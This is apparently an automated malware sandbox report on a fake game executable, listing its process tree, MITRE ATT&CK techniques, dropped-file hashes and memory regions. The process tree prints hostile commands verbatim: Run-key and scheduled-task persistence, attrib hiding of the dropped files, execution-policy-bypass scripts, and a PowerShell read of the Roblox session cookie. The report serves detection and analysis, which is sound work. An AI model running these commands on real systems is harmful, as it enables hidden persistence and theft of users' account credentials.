  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupfUc7wH /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe /f"
  2⤵
  PID:3204
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupfUc7wH /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe /f
    3⤵
    - Adds Run key to start application
    PID:5732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe\"""
  2⤵
  PID:6256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:10812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe\""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7496
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe
      4⤵
      Views/modifies file attributes
      PID:5736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\BlendyGameBeta.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:6140
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:4232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs\"""
  2⤵
  PID:6176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs\""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6964
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs
      4⤵
      Views/modifies file attributes
      PID:8388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_fUc7wH /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs /f"
  2⤵
  PID:1376
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_fUc7wH /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs /f
    3⤵
    - Adds Run key to start application
    PID:5124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\7mntempScript.ps1"
  2⤵
  PID:5800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\7mntempScript.ps1
    3⤵
    PID:5448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutV5ymU.ps1" -RunAsAdministrator"
  2⤵
  PID:8052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutV5ymU.ps1" -RunAsAdministrator
    3⤵
    PID:5176
- C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\BlendyGameBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3388 --field-trial-handle=1696,i,12433070087031923515,15424105341247853601,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:5960

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7140

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7232

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7292

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7284

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7408

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7508

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7528

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7684

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7772

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8152

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8140

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8132

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8124

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8112

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8104

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8096

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8080

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8064

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8072

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8048

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8040

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8032

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8024

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:8016

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8008

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:8000

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7992

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7984

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7876

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7868

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7860

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7852

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7828

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7820

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7812

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7804

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7784

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7760

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7736

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7724

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7712

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7696

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7672

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7664

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7656

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7648

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7640

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7624

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7616

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7608

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7600

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7592

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7576

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7456

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7448

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7440

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7432

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7424

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7416

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7400

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7376

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7332

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7316

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7268

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:7260

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7252

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7216

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:5888

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7164

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7156

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:10800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

Filesize
978B

MD5
04c23766134b234e85cc537b2162efb1

SHA1
45c48d9ca30a4580a682f025cc66331e49f6f158

SHA256
f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900

SHA512
d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

Filesize
78KB

MD5
7c960af459ad74249060e409f5e3cb76

SHA1
168e02a1d769c61c55ffac2eca82ee051b2dcbbc

SHA256
25b4a64b28b7956d91c9cbbf8b2e8e3d3ffada643971c852ecc16373cd8462d6

SHA512
218d8ea1681486c102426f7d8576bfcd512a01d4939c810ad7bca15dd8d141621ca383e5f0f05165f52a2fef2dc7048e324c947b01a761daaa40623283f7cc50

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

Filesize
61KB

MD5
2665d7c0adbdffa55f879e3416d22dac

SHA1
08d90697307d5e2c6bd9acad1150bab8afddb0cc

SHA256
c814c50c54a283aeb1f840a9b4942762559db191d951cb10a261beda842422d6

SHA512
3ac45fdac9c8bd81fc45e8847602d6b01645a8b617a168e83ef2ad0039f91e776616d20f95bdcd3c269e5d06d2829cc383a0a72d68c6ec3d6d38c2c28b836cf3

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

Filesize
2KB

MD5
192e90432fed0081abb25295d8f309c4

SHA1
5150e93061f39e26688afd60a04c0ab14b510d47

SHA256
3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2

SHA512
9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

Filesize
10KB

MD5
9f74f11972c3c0b161832ffab541bf31

SHA1
e5841ba20a229cdeab85d30690509e649e848271

SHA256
8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032

SHA512
b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

Filesize
87KB

MD5
08d376498d44f3389b6d4347ede323ba

SHA1
09fd6b2c234de29eb1de3ea8dbb1ed3dcd8bf156

SHA256
319b6fc2f2a83505f206a880d6b6976e7b6b09a22cee9791cd7eececfa64afc7

SHA512
0a579f22342f2a43278cfb70b1e818eee2ce8312c64350c107d6bc4c8ddb6e35b8cf72ebb53ed2723aafecc4480861eee50adb64910f97ef5e3b5da3fbd5a5ce

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

Filesize
790B

MD5
42ac88deb5c3cfc02fdc1c27319ee067

SHA1
97b1addf35159800b90743fcfbb5505e80f6eb82

SHA256
28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb

SHA512
77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8d460ce715a00afd56cda62e926b8b17

SHA1
3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22

SHA256
195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb

SHA512
1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fff254cb5c3afd42123a4696fea48838

SHA1
2522f8d37166c8202ed692a4f7e44464cb35fe11

SHA256
e27dc87caf719841f1cddfcbd53d9a49278f9da06b13b607799a07141a7adfec

SHA512
4cd8f4dd861947242ba2ff4eb4ac3b07f7afbf5c7b73ead1f3e3052c9976b6f0d5515f661f4dc4b487ecc99ff99a048767e38f925531ec2718fbf300c5d5f7d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0a048420c27cad407e64fb254f8f27fa

SHA1
51fd97e6718c0f1a26f0c5503bc4ba4bb0cb003f

SHA256
b64372d7762ee56fe7666e0a18bb5d4f3cc1c631d3ebbe78b9f868f492a42f09

SHA512
fcb9cfda8c709d28c6e72615a44a647765a48b8e6b8cb940e27bb15555af9ae06499af93f2ccd8b7c2a25c4919b865959389d5eb3f9d11cf2e6856c01e1111d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5c771e4b2e6e038349b2dca749c2e6cc

SHA1
c6ebc7c153c187fa4ea6a8eb650756ede3fe72ef

SHA256
cec7c2adfac98c15b7da929d639d84b861fe2a37ffcfb5920714adf28c2d5aec

SHA512
f8c6d3bc587ef61aacb95a7ca76a7866bad8e942e2a2ef5742030256fdeae3ea4bb86222a597bf591137ce6001134ccc49cbef908a99be5d931e132060eaf1db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
561ad4794e22ab68a6811d88e43d6c06

SHA1
3dcd045d3e0fb917c67ec36cfe102e50a9b3c41c

SHA256
250e7bac495dbd6e656b75106b03b7e741c7508097fbd32cf78627061b7ceade

SHA512
00273fa6bf017c674a48e3b9b4757f083540846de66abf8c2b8fc878d38475cf284f3ebefc597600a393ec18c8027a6628e6698ab5a3086fe60e1aa6ef733c96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2SNBzFMvzYIh_temp.ps1

Filesize
727B

MD5
ee0c9841c5e19021e15804ec20303907

SHA1
33a395064e71b3099f0f205b0d98a439bb84707b

SHA256
b49201ed13d0e34ac070cbb56609b2d51540f5c3fbec555390862128348dfcc2

SHA512
2a5833b8b2937cc41e4e10c8664334de5dc7490ca0cbac342fbb4575b5bd596d4cefae446bbeabb5438a0a58b299d45c583ca5766d5e18bc0c44f06a5fe3208f

Download Submit
C:\Users\Admin\AppData\Local\Temp\61901fb4-93f2-4e18-b020-112bf91b6219.tmp.node

Filesize
1.8MB

MD5
3072b68e3c226aff39e6782d025f25a8

SHA1
cf559196d74fa490ac8ce192db222c9f5c5a006a

SHA256
7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

SHA512
61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7mntempScript.ps1

Filesize
5KB

MD5
f464a6ed0665ca78a90649a7e91173e5

SHA1
290b0990687171f84955115fb6709746a147265c

SHA256
a54cf873bed55815ae20455e99af3f4c0ce6db0b54bff772f67639f0d69ed34c

SHA512
6c218547208e3b34c9907722b26185974b744dd14185851c1853b9567eeec757fac8e2f9fa7fdf0c764f46824d8be6f4ed773b48e027a08c2b8b0a4275da6728

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip

Filesize
3KB

MD5
9e444ea9bd6f14a581de43b9d33b6e95

SHA1
818f4f58d49e50c829100ce20bb28423edb6e0fd

SHA256
d06fe33d8fad18bc17677c580999f08139c08c45b74025cfec11fd6d22817dd5

SHA512
144e5d17e0d2d33d7e77e28dd44d196b941a596d99fe3908d0c1ab85ef4be0bf0ab62d8898e924f08550fb4ba3caed1f92aff12a1348373e109cb2a285d3ae17

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ykqcfept.dbe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\e11ae89b-48c3-4d9b-af2e-6324731af5af.tmp.node

Filesize
154KB

MD5
baa02f91cbc769987aa69509b3e01f54

SHA1
1450c57d3dba038a8043b9de919eab338a571ac2

SHA256
35be58567b8780492b40eb2251d99799a003df7be1c5fa8cf5b4452f6c7e315d

SHA512
59b3d316e452ba4f8c341470ba2085ef0f6f2e0c658813f38bffe0aad3ca29ca86a131300058750f4b2c912ce7623088a945c6db7798bd8e85d3006fe8e9c65d

Download Submit
C:\Users\Admin\AppData\Roaming\GimBLQf9P91B.vbs

Filesize
130B

MD5
d1111fbbaef28413de4a0a64e0d54f2d

SHA1
5bbadc5c5d504dcba5509d34986125e8446e3830

SHA256
beed3a3f6edc1e1b73a3cafa55f16ba61d56c87b7506ae9c33eb630bcbaa3a01

SHA512
1196efb8579efc91105000afaac0b6c14f386aa29a64ddd88f9a2d6a980bd2eb8dd6a2e78457eb9e5614f9492d0e75342f01293c1a8341b153357f2d64c64af0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_fUc7wH.vbs

Filesize
4KB

MD5
5ee431a3e6f3c1597c4d965ce21c248c

SHA1
68280bd6feb34d9b325ad627ceaec12ec775c560

SHA256
72a8f78ae019028535df38ef5b381f803d0cf75fe7ec6dcb6eb9eacbb9fcc383

SHA512
8fadbaaa1cb9f4662b1579ca38437c772e4a8fb21610f561c597bb2ba6fc8c464b064e447b9fbb7159e5ac32543ca360496efe877fd9f5437230f5f26a93d0a6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
4ed379ad24f3e5937fc749ff4c148af1

SHA1
5a4b92e4847ca65b676012d427cba4d46b6e0467

SHA256
ae242e99bb88682b2171005c803da6148a020d7783172142365f4ca728387fe4

SHA512
4fa8d1201a1c062ce9e63337906d37ee85087ab9f91aec40238b05378b2c41b20e5a6e93e35bed4b936b4d658dda325a9fda55497808c413947376172f40d54b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
4d44585ac84377000407a16aac904238

SHA1
dd0fe236ebbe82678aa6224920ad084d7d14e9e3

SHA256
41efa8aeeb15299c94812fbd4f5ac557fbc30541f99543a25b3a8f904c7a5b0c

SHA512
3eba90e9920841a4c0ccef09e62274eee9fdb607b88f2144fad14c536894d73ae341d4d7f0bc318892bdea546a176d55a4a45c96e4a4ac8e10d8678c57370f99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
b86f3793f4446b5476cb2154f8e22213

SHA1
6b65ee3d3fb69d74a8a90c593c0d0a040b52b2ae

SHA256
31d1b7e9dadf5b2500e4509a612aadb370c46a6dcb150f8a5c478a3eb8ef4c43

SHA512
648e121ecade45710adf14fc087700aa92dfd597d9a73175a42724cfbb66464c4a4757209fdf448bfa035622dbf92fd826c310d5fe3a1fe0910ea0ce3e6b36ec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
7d79f7818c353ddb1207db89d110b11f

SHA1
6adbc8ac10045257b977b9ae9821f1394f3de23f

SHA256
a6c08dffafb5f637251a455c56dfa7ddca69755829fa4dcdfca6add1b3763f83

SHA512
806fe10599a0a6379928659e441378e1e7c732358c3ea2655a9044dca9b7e87cdfd81ac2c75d925cab2f8e76a152966e110f0ca15f5a66a4da8dfe1a1157e77d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe

Filesize
18.4MB

MD5
6b8f2e3a25c84f3ab5783d7f1e3158fb

SHA1
34d132d18121ec21e97f3574c3cd7cb1ff44992c

SHA256
219fbec0c6f46b1ec7e7a650448766a713507b91d4c3021c54abe13803aa768c

SHA512
f0db841793a508ed51b713a5791f8abdee4ccda9557219ba3936bfe8aa1995631cae1d058530ab036054908785a2bc06aa72e2ed74f8650db66aa849653e4fcf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\stdidscq.default-release\places.sqlite_tmp

Filesize
1.5MB

MD5
95cd7eb50e3a9d4c1f3d834932e1dcfa

SHA1
71d8bc783950d5c74e9e6699ae2d91c0f374b47b

SHA256
0dbc704fc2b7994db6b12db5f40618cfc59deacb358bb2b8bff53d02f15347a4

SHA512
17d467dbae172158beab56cfd35c5967f8e7a0414ba266c42f48272f107f2184d46a33c0107b51d81b324e7da909333398a1d018b4b7f7803346ced68fc63976

Download Submit
C:\Users\Admin\AppData\Roaming\salutV5ymU.ps1

Filesize
349B

MD5
28e4eda7451c625bbe806b745753f729

SHA1
d29e9b2c2ac5b10188cbae92cffba6827728543d

SHA256
da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba

SHA512
932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

Download Submit
memory/1584-255-0x0000023BB5F70000-0x0000023BB5F80000-memory.dmp

Filesize
64KB

Download
memory/1584-299-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/1584-249-0x0000023BB5F70000-0x0000023BB5F80000-memory.dmp

Filesize
64KB

Download
memory/1584-302-0x0000023BB5F70000-0x0000023BB5F80000-memory.dmp

Filesize
64KB

Download
memory/1584-334-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/3432-549-0x0000015F603E0000-0x0000015F603E1000-memory.dmp

Filesize
4KB

Download
memory/3560-345-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/3560-315-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/3560-330-0x000001D4F0F70000-0x000001D4F0F80000-memory.dmp

Filesize
64KB

Download
memory/5176-473-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/5176-474-0x000001FA22230000-0x000001FA22240000-memory.dmp

Filesize
64KB

Download
memory/5176-493-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

Filesize
10.8MB

Download
memory/5448-462-0x000001D6FAEE0000-0x000001D6FAEF0000-memory.dmp

Filesize
64KB

Download
memory/5448-547-0x000001D6FAEE0000-0x000001D6FAEF0000-memory.dmp

Filesize
64KB

Download
memory/5448-461-0x00007FFD86C30000-0x00007FFD876F1000-memory.dmp

